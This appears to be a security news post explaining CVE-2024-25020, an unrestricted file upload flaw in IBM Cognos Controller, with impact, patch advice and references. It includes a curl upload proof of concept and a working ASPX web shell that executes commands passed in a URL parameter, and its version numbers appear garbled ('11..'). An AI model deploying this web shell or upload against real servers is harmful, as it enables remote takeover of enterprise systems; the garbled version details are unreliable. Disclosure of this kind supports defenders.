CVE CyberSecurity Database News

CVE-2024-25020 - Remote Code Execution in IBM Cognos Controller via Malicious File Upload

Poster -

In early 2024, a critical vulnerability was disclosed in IBM Cognos Controller versions 11.. and 11..1. This flaw, identified as CVE-2024-25020, opens up a direct path for attackers to compromise enterprise environments through unrestricted file uploads. In this post, we’ll break down how this vulnerability works, demonstrate exploitation with code snippets, discuss potential impacts, and link to essential references.

Vulnerability Overview

IBM Cognos Controller is a widely used financial reporting and consolidation solution. An oversight in access control allows users to upload files without restriction on file type. Specifically, on the Journal entry page of versions 11.. and 11..1, the application does not validate or sanitize file extensions for uploaded attachments.

This enables attackers to upload dangerous executable files (like .exe, .bat, or even web shells), which can later be used to compromise systems or deliver malware to other victims.

The attacker logs into IBM Cognos Controller and opens the page used for journal transactions.

Upload Malicious File

Because there’s no restriction on file types, the attacker attaches a file containing malicious code (ex: a reverse shell written as a script or a disguised executable).

Trigger the Payload

If the attachment is opened by an admin or another user (or in some setups, processed by a backend service), the payload gets executed, potentially giving the attacker remote access or allowing data theft.

PoC: Uploading a Malicious File

Let’s see what this looks like with a simple curl request—assuming you have an authenticated session cookie.

curl -k -X POST \
  -F "file=@/tmp/malicious.exe" \
  -F "description=Test Malicious Upload" \
  -b "JSESSIONID=YOUR_SESSION_COOKIE" \
  "https://cognos-controller.example.com/cc/journal/attachments/upload";

Note: Change the endpoint to the actual file upload handler as discovered through inspection (for demo: /cc/journal/attachments/upload). The application will save the file without checking its type or extension.

A simple ASPX web shell could be uploaded (if the server processes ASPX), like this

<%@ Page Language="C#" %>
<%
    if (!String.IsNullOrEmpty(Request["cmd"]))
    {
        System.Diagnostics.Process.Start("cmd.exe", "/c " + Request["cmd"]);
    }
%>

Attacker uploads this as shell.aspx. They can then call

https://cognos-controller.example.com/attachments/shell.aspx?cmd=whoami

> Warning: This is a dangerous attack with high potential impact.

Real-World Impact

- Remote Code Execution: Malicious files can be executed on the system, giving the attacker full control.
- Malware Delivery: Uploaded executables can be sent to internal users, spreading ransomware or spyware.

Mitigation and Recommendations

IBM has released upgrades and advisories to remediate this issue. Users of IBM Cognos Controller 11.. and 11..1 should upgrade immediately to a patched version.

References & Further Reading

- IBM Security Bulletin: Vulnerability in IBM Cognos Controller affects 11.. and 11..1 (CVE-2024-25020)
- NVD Entry for CVE-2024-25020
- What is Remote Code Execution? (OWASP)
- File Upload Vulnerabilities Explained – PortSwigger

Conclusion

CVE-2024-25020 is a serious reminder of the necessity to properly secure file upload mechanisms. Allowing any file type to be uploaded, especially in financial or high-trust systems like IBM Cognos Controller, is a catastrophic risk. Organizations must patch now, harden their upload logic, and continually audit their applications for similar exposures.

Timeline

Published on: 12/03/2024 18:15:12 UTC
Last modified on: 12/11/2024 03:28:15 UTC